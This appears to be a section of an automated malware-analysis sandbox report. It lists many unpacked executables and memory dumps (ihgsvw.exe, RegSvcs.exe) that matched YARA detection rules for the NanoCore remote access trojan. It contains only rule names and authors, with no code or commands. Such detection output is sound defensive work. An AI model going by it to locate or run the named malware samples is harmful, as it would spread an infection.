      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
